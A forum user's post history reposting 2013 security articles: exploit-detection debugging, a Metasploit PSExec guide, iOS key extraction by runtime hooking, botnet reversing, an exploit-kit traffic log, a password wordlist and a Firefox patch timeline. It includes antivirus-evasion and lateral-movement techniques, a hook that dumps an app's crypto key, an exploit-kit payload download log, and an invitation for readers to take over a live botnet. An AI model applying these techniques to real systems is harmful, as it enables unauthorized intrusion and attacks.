Jump to content

Nytro

Administrators
  • Posts

    18725
  • Joined

  • Last visited

  • Days Won

    706

Everything posted by Nytro

  1. Welcome to a world through Glass. It’s surprisingly simple. Say “take a picture” to take a picture. Record what you see. Hands-free. Even share what you see. Live. Directions right in front of you. Speak to send a message. Ask whatever’s on your mind. Translate your voice. Answers without having to ask. Strong and light. Evolutionary design. Charcoal, Tangerine, Shale, Cotton, Sky. See how Glass feels. Video: http://www.google.com/glass/start/how-it-feels/ http://www.google.com/glass/start/how-it-feels/
  2. [h=3]Using a Custom VDB Debugger for Exploit Analysis[/h] By @darkrelativity on February 14, 2013 Analyzing an exploit and understanding exactly how the exploit lands can take a long time due to inadequate analysis tools. One way to speed up understanding how an exploit behaves is to use Vtrace and VDB. In this post I explain how to create a custom VDB debugger in order to detect, analyze, and prevent execution of an exploit payload. Background on Vtrace, VDB, the vulnerability and the exploit Vtrace is a cross platform and cross architecture debugging API. VDB is a cross-platform and cross- architecture debugger that uses Vtrace. Both tools are available at http://visi.kenshoto.com. To illustrate why you may want to use VDB and Vtrace to create a custom debugger, I’ll use the NVIDIA exploit released on December 25th, 2012 on the full disclosure mailing list. (See Full Disclosure: Exploit for NVidia nvvsvc.exe for the exploit itself). Thanks to @peterwintrsmith for providing me a fun bug and giving me a good example to demonstrate a few capabilities of Vtrace and VDB. Without going into too much detail about the exploit, the NVIDIA driver installation package installs a service with description ‘NVIDIA Driver Helper Service’ and service name ‘NVSvc’. The service executable points at ‘%systemroot%\system32\nvvsvc.exe’. When the service is started, ‘nvvsvc.exe’ creates or uses an existing named pipe at ‘\\.\pipe\nvsr’. Next, the service waits for a client to connect to the named pipe. When a client connects to the named pipe, the service spawns a thread to read data from the pipe. There are different types of messages a client can send to the pipe. The message type is specified as the first two bytes of the message. The exploit targets the state machine of the message processing code that parses messages with opcode 0×52. This message format appears to allow clients to send a Unicode registry key name and registry key value. The parts of the message relevant to the exploit are: Opcode (message type) Registry Key Name Registry Key Value Size Registry Key Value There are at least two problems with the ‘NVSvc’ service. The first problem is with the permissions on the named pipe. Figure 1 shows the permissions of the named pipe. The permission FILE_ALL_ACCESS indicates that anyone can send messages to the pipe. Figure 1: Using accesschk to show ‘nvsr’ pipe permissions Reviewing the disassembly reveals the reason why the pipe permissions are wide open; the code creates the ‘nvsr’ named pipe with a NULL DACL that allows anyone to read and write to the named pipe. The second problem is how ‘nvvsvc.exe’ handles messages with opcode 0×52. Pseudocode for the second problem is in Figure 2. Figure 2 shows how the message processing code determines the message type by using the opcode in the message, uses wcsnlen to obtain the length of the registry key name, and subsequently uses that length to index into the message and retrieve the registry key value size. Next, the registry key value size is used, unchecked against the destination buffer size, in a memmove operation. The memmove operation is performed between two fixed-length local buffers allocated on the stack. After the memmove, the code writes to the pipe data copied from the local buffer again using the unchecked registry key size value. As described in the attachment to the email on the full disclosure list, the positioning of the 2 buffers in memory allows for memory disclosure, dynamically determining the version of the ‘nvvsvc’ binary, dynamically determining ROP gadgets, and ultimately, gaining code execution. Figure 2: Pseudocode for the second problem Writing a Custom VDB Debugger to Detect and Analyze the Exploit The purpose of writing this custom VDB debugger is to demonstrate one way to detect and analyze an exploit. This section walks through figuring out how to detect and analyze the NVIDIA exploit released by @peterwintrsmith. How can we detect that these vulnerabilities are being exploited? For this post, I assume that ANY time the program counter goes into a memory map that is NOT backed by a file, then that is “a bad thing.” Therefore, if the program counter ends up in the heap, stack, or another allocated region that is not backed by a file, I want to know about it. Other software, such as OllyDbg, allows the user to break when the program counter is outside or inside a certain range of memory; game protection engines also use this technique to try and restrict hackers from arbitrarily calling ‘protected’ methods from injected code. [1] These methods differ because they do not make a distinction between file backed and non-file backed memory maps. In order to analyze the exploit, I needed to find the vulnerable binaries, compile the exploit and get everything working. My procedure is documented in the following list: Installed the 64bit driver package from NVIDIA (version 310.70) on a 64bit system. Double clicked and extracted, but did not install the package (so I didn’t need to actually have an NVIDIA graphics card on the test system) Navigated into the ‘Display.Driver’ directory, right-clicked and extracted (with 7zip or similar) ‘NvCplSetupInt.exe’ At an administrator command prompt, changed directory into the extracted directory for ‘NvCplSetupInt.exe’, and performed ‘nvvsvc.exe -install’ Copied the nvvsvc.exe binary to c:\windows\system32 Used services.msc or net start nvsvc to start the service Downloaded the exploit and redefined the shellcode payload; I made mine a bunch of 90’s and a single 0xcc breakpoint; compiled the exploit Ran the exploit and made sure it worked Next I extended the stalker subsystem inside of Vtrace and VDB to implement detection of code executing in non-file backed memory maps. If you haven’t used the stalker subsystem before, it performs dynamic disassembly at user specified entry points and sets new breakpoints in the first instruction of each basic block discovered. Depending on the type of instruction, the breakpoint is removed after being hit the first time. In addition, dynamic branch instructions in basic blocks get a ‘special’ breakpoint called a StalkerDynBreak. When hit, the targets of the dynamic branches are computed and new stalker entrypoint breakpoints are set on the targets of the dynamic branch. This is a partial description of stalker, but the minimum required to understand the rest of the post; review the stalker code and see the wiki at visi.kenshoto.com. If you think about the goal, you might wonder why stalker doesn’t already detect execution in non-file backed memory maps. Stalker was designed to work for ‘well formed’ code; not code that manually messes with the stack to alter control flow. The issue is that return instructions do not have stalker breakpoints set on them; stalker assumes that if a basic block was disassembled that contains a call, that at some point later, the program counter will return to the instruction after the call, and eventually hit another basic block that stalker already set a breakpoint on. The NVIDIA exploit manipulates the stack directly to indirectly alter control flow; therefore, I needed to make stalker model all jmp and return instructions as dynamic stalker breakpoints. Therefore, we will create a new type of stalker break called a ‘StalkerRetBreak’. Below is the relevant code for the ‘StalkerRetBreak’ class. Figure 3: Code for StalkerRetBreak class The ‘StalkerRetBreak’ breakpoint reads the return value off the stack and sets a new stalker breakpoint at that address. Therefore, if anything during execution of the function manipulated the return value, stalker will still ‘see’ the control flow transfer. Essentially we’ve turned return instructions into dynamic stalker breaks. A similar change was required to model jumps; these changes were made directly in the StalkerDynBreak class. See [2] for all of the changes. Next we have to write the code that is the automated VDB debugger. Here is the code to do that: Figure 4: Code for the automated VDB debugger When the code in Figure 4 is run, the code restarts the nvsvc service, attaches to the process, sets the initial stalker breakpoint to the start of the function CreateThread specified, and ‘runs’ the debugger. We have a special meta variable that means ‘keep going until someone says to stop.’ When someone says stop, the code outputs the stalker hits and then runs the script ‘disas_hits.py’. The ‘keepgoing’ variable is set by the StalkerRetBreak. If the breakpoint detects a transition to a non-file backed memory map, the StalkerRetBreak will set this variable, and send a break to the debugger. This causes the while loop to exit. You might be wondering what ‘disas_hits.py’ does. ‘disas_hits.py’ iterates over each recorded stalker hit, and for each hit, disassembles the first 16 bytes, stopping early if it hits a return instruction. ‘disas_hits.py’ is responsible for creating the highlighted output at the bottom of Figure 5 that displays the memory map, program counter, and disassembly/gadget. You might wonder why I didn’t include the ‘disas_hits.py’ code in the automated debugger; I didn’t include it because I wanted to be able to run it from the VDB PyQT GUI, as well as in my standalone automated debugger. See code at [2] for the ‘disas_hits.py‘ sourcecode. What does the automated debugger output? Figure 5 shows the output after running the automated debugger (‘c:\python27\python.exe mydebugger.py’) and the exploit: Figure 5: Output of the automated debugger Notice that we detected the call to VirtualProtect (that corresponds to a gadget by address), the gadgets specified in the exploit and the exploit payload that I specified. The gadgets specified in the exploit are in Figure 6. Figure 6: ROP gadgets in the sourcecode of the exploit The exploit ‘payload’ is not executed (but the ROP gadgets still are) since we detected the control flow transfer into the non-file backed memory map; we just print out what *would* have executed for reference. See [2] for a ZIP that contains the sourcecode and the patch against the public release of vdb_20121228. Interested in more posts on VDB/Vtrace/vivisect? Leave me a comment or DM me @darkrelativity. [1] Checking if a function is called from outside the code segment [Archive] - GameDeception - A Development Site for Reverse Engineering [2] https://sites.google.com/site/mvdbcode/ Sursa: https://www.mandiant.net/blog/custom-vdb-debugger-exploit-analysis/
  3. SSLStrip-for-Android SSLStrip for Android This project is port of SSLStrip(https://github.com/moxie0/sslstrip), plus NanoHTTPD and Arpspoof for Andorid libraries. How to build: 1). Go to libs folder, run ndk-build, copy arpspoof to res/raw/arpspoof 2). Compile this eclipse project as usual! PS: For research purposes only. Please do not abuse this software. Sursa: https://github.com/crazyricky/SSLStrip-for-Android
  4. [h=1]PSExec Demystified [/h]Posted by thelightcosine in Metasploit on Mar 9, 2013 10:28:33 AM Multiple modules inside the Metasploit Framework bear the title PSExec, which may be confusing to some users. When someone simply refers to “the PSExec module”, they typically mean exploit/windows/smb/psexec, the original PSExec module. Other modules are more recent additions, and make use of the PSExec technique in other ways. Here’s a quick overview of what these modules are for: [TABLE=width: 437] [TR] [TD]Metasploit Module [/TD] [TD=width: 118]Purpose [/TD] [TD=width: 149]Comment [/TD] [/TR] [TR] [TD=width: 171]exploit/windows/smb/psexec [/TD] [TD=width: 118]Evading anti-virus detection [/TD] [TD=width: 149]Service EXE is now getting caught by most AV vendors. Use custom templates or MOF upload method to circumvent AV detection. [/TD] [/TR] [TR] [TD=width: 171]exploit/windows/local/current_user_psexec [/TD] [TD=width: 118]Local exploit for local administrator machine with goal to obtain session on domain controller [/TD] [TD=width: 149]Great starting point to take over an entire network. Attack is less likely to get noticed because it uses legitimate access methods. [/TD] [/TR] [TR] [TD=width: 171]auxiliary/admin/smb/psexec_command [/TD] [TD=width: 118]Run arbitrary commands on the target without uploading payloads. [/TD] [TD=width: 149]Unlikely to be detected by AV but limited because you can only send one command, not obtain a session. [/TD] [/TR] [TR] [TD=width: 171]auxiliary/scanner/smb/psexec_loggedin_users [/TD] [TD=width: 118]Get list of currently logged in users [/TD] [TD=width: 149]Run this module against all targets to get tons of information on your targets. [/TD] [/TR] [/TABLE] We’ll now look at each one in detail below. First, let’s talk about what PSExec is, and where the idea comes from. [h=2]The PSExec Utility[/h] The name PSExec comes from a program by the same name. Mark Russinovich wrote this utility as part of his sysInternals suite in the late 90s to help Windows Administrators perform important tasks, for example to execute commands or run executables on remote systems. The PSExec utility requires a few things on the remote system: the Server Message Block (SMB) service must be available and reachable (e.g. not blocked by firewall); File and Print Sharing must be enabled; and Simple File Sharing must be disabled. The Admin$ share must be available and accessible. It is a hidden SMB share that maps to the Windows directory is intended for software deployments. The credentials supplied to the PSExec utility must have permissions to access the Admin$ share. PSExec has a Windows Service image inside of its executable. It takes this service and deploys it to the Admin$ share on the remote machine. It then uses the DCE/RPC interface over SMB to access the Windows Service Control Manager API. It turns on the PSExec service on the remote machine. The PSExec service then creates a named pipe that can be used to send commands to the system. [h=2]The PSExec Exploit (exploit/windows/smb/psexec)[/h] The PSExec exploit modules in Metasploit runs on the same basic principle as the PSExec utility. It can behave in several ways, many of them unknown to most users. [h=3]The Service EXE[/h] In this method, the exploit generates and embeds a payload into an executable, which is a Service image uploaded by the PSExec utility – similar to the PSExec service. The exploit then uploads the service executable to the Admin$ share using the supplied credentials, connects to the DCE/RPC interface, and calls into the Service Control Manager before telling SCM to start the service that we deployed to Admin$ earlier. When the service is started, it starts a new rundll32.exe process, allocates executable memory inside that process and copies the shellcode into it. It then calls the starting address of that memory location as if it were a function pointer, executing the stored shellcode. The service EXE is generated using an executable template with a placeholder where the shellcode is inserted. The default executable templates in Metasploit Framework are flagged by major AV solutions because most anti-virus vendors have signatures for detecting these templates. No matter what payload you stick in this executable template, it will get flagged by AV. [h=4]AV Evasion[/h]The PSExec exploit has several advanced options. The first is the options to supply alternative executable templates. There are two separate options: One is to use set EXE::Path, which will tell Metasploit to look in a different directory for the executable templates. The other is set EXE::Template, which is the name of the executable template file to use. If you create an executable template and store it in a different directory, you will need to set both of these options. Writing a custom executable template is a good way to avoid AV detection. If you write your own EXE template for the PSExec exploit, it must be a Windows service image. In addition to writing a custom executable template, you can write an entire executable on your own. This means that a Metasploit payload will not actually get inserted. You will code the entire behavior into the EXE itself. The psexec exploit module will then upload the EXE and try to start it via SCM. Tip: If you would like to save time evading anti-virus, you can use the dynamic executable option in Metasploit Pro, which generates random executable files each time that are much less likely to be detected by anti-virus. (Watch my webcast Evading Anti-virus Detection with Metasploit for more info.) [h=3]The Management Object File (MOF) upload method[/h] MOF files are a part of the Windows Management Instrumentation (WMI). They are Manage Object Files. They contain WMI information and instructions. MOF files must be compiled to work properly, however there is a way around that on Windows XP. In Windows XP, if you drop an uncompiled MOF file in the system32\wbem\mof\ directory, Windows XP will compile the MOF for you and run it. The PSExec exploit has a method for using this to our advantage. If you set MOF_UPLOAD_METHOD true, it will do a few things differently. Our payload EXE will be generated as a normal instead of a service EXE. It will then upload it via Admin$ as expected before generating a MOF file that will execute the EXE we uploaded. It will use Admin$ to deploy the MOF file to the MOF directory. Windows XP will then compile and run the MOF, causing our payload EXE to be executed. The MOF method can be combined with the custom EXE or custom template methods described above to try and evade AV as well. The MOF Method currently only works on Windows XP as later versions require the MOF to already be compiled in order for them to run. [h=2]The PSExec Current User Local Exploit(exploit/windows/local/current_user_psexec)[/h] The Current User PSExec module is a local exploit. This means it is an exploit run on an already established session. Let’s set up a scenario to explain how this works. In our scenario you do the following: Set up a browser exploit at some address Trick a local system administrator to visiting the site Get a reverse Meterpreter shell, inside the administrator’s browser process Run netstat to see if the administrator is connected to one of the Domain controllers So now Meterpreter is running on a system administrator’s box under her user context. While there may not be something you’re interested in on her workstation, she has permission to access a domain controller (DC), which you would like to shell. You don’t have her credentials, and you cannot talk directly to the DC from your box. This is where the current_user_psexec module comes in. This local exploit works the same way as the psexec exploit. However, it runs from the victim machine. You also do not supply any credentials. This exploit takes the authentication token from the user context, and passes that alone. This means you can get a shell on any box the user can connect to from that machine and has permissions on, without actually knowing what their credentials are. This is an invaluable technique to have in your toolbox. From that first machine you can compromise numerous other machines. You can do this without having set up any proxy or VPN pivots, and you will have done it using legitimate means of access. [h=2]The PSExec Command Execution Module (auxiliary/admin/smb/psexec_command)[/h] Submitted by community contributor Royce @R3dy__ Davis, this module expands upon the usefulness of the PSExec behavior. It utilizes the same basic technique but does not upload any binaries. Instead it issues a single Windows command to the system. This command is then run by the remote system. This allows arbitrary commands to be executed on the remote system without sending any payloads that could be detected by AV. While it does not get you a shell, it will allow you to perform specific one off actions on the system that you may need. [h=2]The PSExec Logged In Users Module (auxiliary/scanner/smb/psexec_loggedin_users)[/h] Also brought to you by Royce @R3dy__ Davis, this module is a specialized version of the command execution one. It uses the same technique to specifically query the registry on the remote machine and get a list of all currently logged on users. It is a scanner module which means it can also run against numerous hosts simultaneously, quickly getting the information from all the targeted hosts. [h=2]Summary[/h] What we’ve seen here is that the PSExec technique is actually a relatively simple mechanism with immense benefit. We should all remember to thank Mark Russinovich for this wonderful gift he has given us. As time goes by, people will find many more uses for this same technique, and there is room for improvement on how these modules work and interact. The PSExec exploits are two of the most useful, and most reliable, techniques for getting shells in the entire Metasploit Framework. Sursa: https://community.rapid7.com/community/metasploit/blog/2013/03/09/psexec-demystified
  5. Retrieving Crypto Keys via iOS Runtime Hooking Tuesday, March 5, 2013 at 8:45AM I am going to walk you through a testing technique that can be used at runtime to uncover security flaws in an iOS application when source code is not available, and without having to dive too deeply into assembly. I am going to use a recent example of an iOS application I reviewed, which performed its own encryption when storing data onto the device. These types of applications are a lot of fun to look at due to the variety of insecure ways people implement their own crypto. In this example the application required authentication, and then pulled down some data and stored it encrypted on the device for caching. The data was presented to the user where they could “act” upon it. Sounds pretty generic, but hopefully the scenario is familiar enough to those who assess mobile apps. Upon analyzing the application traffic, it was obvious that no crypto keys were being returned from the server. After sweeping the iOS Keychain and the entire Application container, I could make the educated assumption that the key is either a hardcoded value or derived using device specific information. Using the Hopper Disassembler (Available on the Mac App Store), I was able to see that the application was leveraging the Common Crypto library for its encryption. I checked the cross-references for calls to the CCCryptorCreate function in order find the code areas which perform encryption. The following screenshot shows getSymmetricKeyBytes being called right before the CCCryptorCreate function. I felt pretty confident that the purpose of the getSymmetricKeyBytes method was going to be to return the symmetric key used for encryption. I decided to create a Mobile Substrate tweak in order to hook into getSymmetricKeyBytes and read the return value. I used the class-dump-z tool to get a listing of all the exposed Objective-C interfaces. From here it is easy to get more detailed information about the method, such as the class name, return type and any required parameters. The following is a short snippet retrieved from the class-dump-z results. @interface SecKeyWrapper : XXUnknownSuperclass { NSData* publicTag; NSData* privateTag; NSData* symmetricTag; unsigned typeOfSymmetricOpts; SecKey* publicKeyRef; SecKey* privateKeyRef; NSData* symmetricKeyRef; } [..snip..] -(id)getSymmetricKeyBytes; -(id)doCipher:(id)cipher key:(id)key context:(unsigned)context padding:(unsigned*)padding; [..snip..] We can quickly create a tweak by using the Theos framework. The tweak in this case looked as follows: %hook SecKeyWrapper - (id)getSymmetricKeyBytes { NSLog(@”HOOKED getSymmetricKey”); id theKey = %orig; NSLog(@”KEY: %@”, theKey); return theKey; } %end %ctor { NSLog(@”SecKeyWrapper is created.”); %init; } It doesn’t do much more then read the return value of the original method call and write it out to the console. It was possible to confirm that a static key was being used by running the tweak on another iPad, and observing that the same symmetric key was returned. The next step was to decrypt the files. We could hook into the doCipher:key:context:padding method and just print out the first parameter to get the plaintext data. That would work, but that wouldn’t be reproducible since the Tweak code would only execute when the doCipher:key:context:padding method is actually run by the application. A quick Google search on the SecWrapper class turned up the following sample code from Apple. Sursa: GDS Blog - GDS Blog - Retrieving Crypto Keys via iOS Runtime Hooking
  6. [h=1]A BIG password cracking wordlist[/h] Defuse Security have released the word-list used by their Crackstation project It really is something.. The numbers? 4.2 GiB compressed. 15 GiB uncompressed. 1,493,677,782 words It’s a mix of every wordlist, dictionary, and password database leak every word in the Wikipedia databases (pages-articles, retrieved 2010, all languages) as well as lots of books from Project Gutenberg also includes the passwords from some low-profile database breaches that were being sold in the underground years ago I was in the process of doing this also for my own stuff, mixing all of the password database leaks along pr0n password dumbs, so yeah these guys saved me a lot of work I don’t really know how this wordlist compares to UNIQPASS v11 but, that’s something for someone else to find out Now.. on to hashcat for some tests P.S: A guide on using hashcat will follow sometime in the near future ;p Torrent Download: Download A BIG password cracking wordlist Torrent | 1337x.org Sursa: A BIG password cracking wordlist | 57un
  7. [h=1]Reversing a Botnet[/h] Howdy fellow crackers and hackers alike! Have I got a treat for you? A live botnet. The other day at work, I encountered a number of machines all attacking other hosts. Normally its just one machine, but this there were several. We isolated the exe responsible because it was eating up 100% CPU (not exactly subtle). I was curious about what made it tick, so I disassembled it and this is what I found. Normally where I work, we’re hit by botnets, and never get to catch them in the act as tracking down the mothership is difficult. First things first, I want to know more about the executable, like if its packed, or what have you. As the picture shows, the executable is NOT packed, rather just your standard run of the mill PE (portable executable) file. The 2 extra sectioned highlighted tell is the type of compiler used – GCC for windows aka mingw, meaning either CodeBlocks was used or Devcpp. I say this because the .bss and .idata sections are specific to GCC and remind me of ELF (executable linker format) used by Linux. Since I don’t want to join said botnet, I’m sticking to static analysis. Opening the thing up in IDA, we find exactly what kind of malware we’re dealing with – amaturish. The strings are not encoded, nor are they hidden. The first thing I noticed was the IP address. For those curious, a quick search on ARIN reveals the IP address as belonging to some collocation service in Atlanta: http://whois.arin.net/rest/net/NET-199-229-248-0-1/pft The next thing we see is the channel name #test(more on that in a sec), then the passwords. The ‘Operation Dildos’ name deduces that our malware writers are either 14, or immature. I still chuckled though. The next thing I determined was the type of bot we were dealing with. Scrolling further through revealed IRC instructions. You’ve read RF C1459 right? IRCHelp.org — Untitled Page JOIN, PING, PONG, NICK, PRIVMSG – these are all IRC commands. Further inspection of the bot revealed the commands the that can be issued to the bot by its master. The commands are ‘help’ – derp. ‘version’ – derrrr. ‘speedtest’ – perform a speed test by performing web request to 68.11.12.242 which traced this to Louisiana. I have a feeling our malware writer lives in that area because of the botnet server resides in Georgia. Just a guess ‘exec’ – Execute a command. ‘dle’ – Download and execute a file. ‘udp’ – Do a udp flood. ‘openurl’ – Open a hidden window of a URL. ‘syn’ – Do s syn flood. ‘stop’ – Stops execution. If you’re curious how the bot performs the lookup on the command, here it is. What you can’t see is the stub at the top which belongs to the subroutine responsible for the IRC connection to the server. Next thing I found scrolling through was the error handler data section – messages sent to alert the master that said command completed. The last thing in this reversing session I’d like to point out is just before the command listing – the password check. The assembly instruction ‘repne scasb’ is a string operation. It means scan string for NULL decrementing the ecx (extended counter register) for each char. I see it primarily with string comparison operations. Enough about the bot itself, lets learn more about the botnet. A quick ping shows us its still online. You may also notice Connecting to it seems to work, so its still operational. The botnet itself seems to be growing because when I looked last night, there were only 400 hosts. Checking now, I see ‘There are 3 users and 1131 invisible on 2 servers’ When i connected, I was called out by the server admin within minutes whom I saw the first time I connected. Since I don’t want to throw rocks at a hornest’s nest (get my server DDOS’d off the net), I decided not to further pursue. My readers on the other hand, go nuts. You have the password to issue commands, you have the irc server address, you have the channel where the bots reside (#test). Perhaps I may try again tonight at like 1 am when the admins are probably asleep. Until then, keep on cracking. For those of you who are curious, you can download the bot here, complete with IDA 6 compatible db file: The Bot. Sursa: Reversing a Botnet
  8. [h=1]CVE-2013-1493 (jre17u15 - jre16u41) in Cool EK[/h]That was fast (4 days after patch). After CVE-2013-0634 (flash), it's now CVE-2013-1493 (last know vulnerability up to jre17u15 - jre16u41) that reach Cool Exploit Kit (from Reveton distributor - btw this ransomware seems to be clothed again with what i called the Winter II design) Credits first : Will Metcalf from Emerging Threats for the "path" part of the landing. Michael Shierl for confirming (and giving more clues) that it looks like CVE-2013-1493. Chris Wakelin for additional tips I will update here integration in other exploit kits (would be surprising if it does not happen..and will modify title) Cool EK : jre17u15: [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]CVE-2013-1493 successful path in Cool EK (jre17u15) 2013-03-08[/TD] [/TR] [/TABLE] jre16u41: [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]CVE-2013-1493 successfull path in Cool EK (jre16u41) 2013-03-08[/TD] [/TR] [/TABLE] GET http://retrempercircum[...].glamorizesports.com/world/bright_rural_mutter.html 200 OK (text/html) GET http://retrempercircum[...].glamorizesports.com/world/rug-magistrate.jar 200 OK (application/java-archive) a3410c876ed4bb477c153b19eb396f42 GET http://retrempercircum[...].glamorizesports.com/world/improved_violently_section.swf 404 Not Found (text/html) GET http://[...]/world/getnn.jpg 200 OK (application/x-msdownload) e343845066df8c271b5ac095f2d44183 Out of scope Reveton Note : if you get infected with java 1.7u > 10 , don't try to say you were not warned ! [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Security in jre17u>10 Want to get infected ? follow the bubble[/TD] [/TR] [/TABLE] For java 1.6...things are differents [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center] [/TD] [/TR] [TR] [TD=class: tr-caption, align: center]In jre16 (no comment)[/TD] [/TR] [/TABLE] Files: a3410c876ed4bb477c153b19eb396f42 (nothing more for now) Reading : YAJ0: Yet Another Java Zero-Day - 2013-02-28 - Darien Kindlund and Yichong Lin - FireEye Blog CVE-2013-1493 - Mittre Latest Java Zero-Day Shares Connections with Bit9 Security Incident - 2013-03-01 - Symantec Posted 21 hours ago by Kafeine Sursa: Malware don't need Coffee: CVE-2013-1493 (jre17u15 - jre16u41) in Cool EK
  9. [h=1]Protecting Mozilla Firefox users on the web[/h] I have followed Pwn2Own ever since its inception in 2007. For those of you who do not know what Pwn2Own is, it is a competition in which hackers try to take advantage of software weaknesses in browsers (Internet Explorer, Firefox, Chrome, Safari etc.), put up specially crafted webpages and click on them to try and launch another application, usually calc.exe. They then gain a monetary reward in return. It usually happens on the sidelines of CanSecWest, a yearly security conference held in Vancouver. During my university days in Singapore on the other side of the world, I always followed this competition with anticipation. I told myself, one day, just one day, I will be at the frontline helping to decipher the problem and help to get the fix out to Firefox users around the world as soon as possible. Over the years, a security researcher by the name of Nils took down Firefox in 2009 (bug 484320) and in 2010 (bug 555109), whereas in 2011, nobody took down Firefox. Last year in 2012, I was on-site in Vancouver and I witnessed Willem Pinckaers and Vincenzo Iozzo take down Firefox. However, the bug (720079) was already identified and fixed through internal processes. This year, Pwn2Own became the venue for many exploits against major browsers, including Firefox (bug 848644), as well as other plugins which are more often used in browsers, such as Flash and Java. The team that took down Firefox this year was VUPEN Security, who also punched holes through Internet Explorer 10, Java and Flash. Some of my colleagues / co-workers were present at the conference and were relaying us information live, while I stayed back at the office preparing my machines to diagnose the issue. === The following timeline (all times PST) describes my role behind the scenes with respect to the Firefox exploit by VUPEN, on March 6, 2013: ~3pm: Rumblings heard on IRC channels that Firefox has been moved from its scheduled slot to 5.30pm. 5.30pm: VUPEN gets ready. ~5.54pm: VUPEN takes down Firefox. On-site team gets to work getting details of the exploit. ~7pm: Bug 848644 gets filed. Looking at the innings of the testcase, together with confirmation with team members over IRC that there is no malicious code present (Proof of Concept (PoC) code just crashes), I manage to reproduce the crash on a fully-patched Windows 7 system. More analysis from early responders flow in; information such as the attack vector (Editor), Asan stack trace showing the implicated functions (possibly nsHTMLEditRules::GetPromotedPoint). I did a quick stab at the regression range here. Using the bisection technique described here, I found that early January 2012 builds did not crash, whereas early January 2013 builds did crash. The testcase seemed initially tricky; until it was eventually found (quite awhile later) that one could reliably trigger this with one tab that somehow caused the “pop-up blocked” info bar to show, I had to try the testcase repeatedly, sometimes reloading, sometimes closing then opening the browser again to trigger the crash. Using mozregression here might have been a good idea – however due to an incorrect decision whether a particular build was crashing or not, one would bisect down to an incorrect regression window and waste precious time. Time was of the essence here – the sooner one gets an accurate regression window, the faster a developer can potentially pinpoint the cause of the crash. I found myself repeatedly downloading and checking builds to see if they did crash or not. Sometimes the crash happened immediately on load (with the initial PoC). Other times it happened only after a few minutes, or only after a restart. I eventually settled on the following regression window: crash happens on the October 6, 2012 nightly, but not on the previous day’s (October 5), and I posted a comment, so this could get confirmation from other people. I then immediately looked through the hgweb regression window to see if anything stood out – bug 796839 seemed like a likely cause, but everything else was still a possibility. in that regression window, more clues emerge. The Asan stack trace pointed to nsHTMLEditRules::GetPromotedPoint being part of the bigger picture here, and some detective work showed that in this changeset from bug 796839, the file editor/libeditor/html/nsHTMLEditRules.cpp was changed, and this was the file that nsHTMLEditRules::GetPromotedPoint was located in. Coincidence? Probably. However, this made everything more likely. At this point in time, it was 8pm, approximately one hour from the point in which the testcase was obtained. I began to consider (and possibly discount) other possibilities, including bug 795610. Thanks to great work by Nicolas Pierron and his git wizardry, we found that nsHTMLInputElement::SetValueInternal (also implicated in the Asan stack trace), existed in nsHTMLInputElement.cpp which was modified in that bug. However, this possibility was quickly discounted. At this point, I was able to get independent verification that the regression window (Oct 5 – Oct 6) was indeed correct. Further checking showed that our Extended Support Releases (ESR) builds on version 17 was also affected. This made bug 796839 extremely likely to be the root cause, because it was landed on mozilla-central during the version 18 nightly window, but was backported to mozilla-aurora at that time, which was the version 17 branch. Bug 796839 would encompass the patch landing that inadvertently opened up a vulnerability in Firefox. Independent confirmation of this regressor came at 9pm. Within 2 hours, we had gotten from having a PoC testcase with no idea what was affected, to knowing which patch caused the issue. I thus nominated for the fix to be landed on all affected branches. By about 10pm, the fix was put up for review. After that, lots of great work by various people/teams went towards quick approvals, landing of the fix, along with QA verification. Overnight, builds were created and by late morning the next day, the advisory was prepared, with QA about to sign-off on the new builds. At 4pm, a new version of Firefox (19.0.2) was shipped with the fix. === Credit must be given to the other Mozilla folks in this effort, who have, outside of normal day working hours, worked till late night to make this possible. I am proud to be part of this fabulous team effort. It certainly has been my honour to have helped keep Mozilla users safe on the web. Sursa: Protecting Mozilla Firefox users on the web | It's a Wonderful Life
  10. [h=1]Cryptographic Primitives in C++[/h] This page walks through the implementation of an easy-to-use C++ wrapper over the OpenSSL crypto library. The idea is to go through the OpenSSL documentation once, make the right choices from a cryptographic point of view, and then, hide all the complexity behind a reusable header. The following primitives are typically used in the applications I write: Random Number Generation Password Based Symmetric Key Generation (PBKDF2/HMAC-SHA-256) Message Digests and Authentication Codes (SHA-256 & HMAC-SHA-256) Authenticated Encryption with Associated Data (AES-128-GCM) The wrapper is a single header file that can be included wherever these primitives are needed. It includes OpenSSL and Boost headers and will require linking with the OpenSSL object libraries. Here is a sample and here are the tests. [h=4]Data Buffers[/h] Most of the wrapper functions work on blocks of data and we need a way to pass these in and out of the wrapper routines. Any C++ container that guarantees contiguous storage (i.e. std::vector, std::string, std::array, boost::array or a raw char array) can be passed as the argument to any wrapper function that takes a data buffer as a parameter. Having said that, it is best to avoid using dynamic STL containers for storing sensitive data because it is diffcult to scrub them off once we're done using the secrets. The implementations of these containers are allowed to reallocate and copy their contents in the memory and may end up with inaccessible copies of sensitive data that we can't overwrite. Simpler containers like boost::array or raw char arrays are better for this purpose. You can also use the following typedef: namespace ajd { namespace crypto { /// A convenience typedef for a 128 bit block. typedef boost::array<unsigned char, 16> block; /// Remove sensitive data from the buffer template<typename C> void cleanse(C &c) The wrapper also provides a cleanse method that can be used to overwrite secret data in the buffers. This method does not deallocate any memory, it only overwrites the contents of the passed buffer by invoking OPENSSL_cleanse on it. [h=4]Secure Random Number Generation[/h] OpenSSL provides a simple interface around the underlying operating system PRNG. This is exposed by the wrapper using the following two functions: /// Checks if the PRNG is sufficiently seeded bool prng_ok(); /// Fills the passed container with random bytes. template<typename C> void fill_random(C &c); prng_ok checks if the PRNG has been seeded sufficiently and fill_random routine fills any mutable container with random bytes. In the exceptional situation that prng_ok returns false you must use use the OpenSSL seed routines RAND_seed and RAND_add directly to add entropy to the underlying PRNG. Here's how you can use them: void random_generation() { assert(crypto::prng_ok()); // check PRNG state crypto::block buffer; // use the convenience typedef crypto::fill_random(buffer); // fill it with random bytes unsigned char arr[1024]; // use a static POD array crypto::fill_random(arr); // fill it with random bytes std::vector<unsigned char> vec(16); // use a std::vector crypto::fill_random(vec); // fill it with random bytes } [h=4]Password Based Symmetric Key Generation[/h] Symmetric ciphers require secure keys and one way to generate them is using the fill_random routine seen above. More commonly however, we'd want to derive the key bits from a user provided password. The standard way to do this is using the PBKDF2 algorithm which derives the key bits by iterating over a 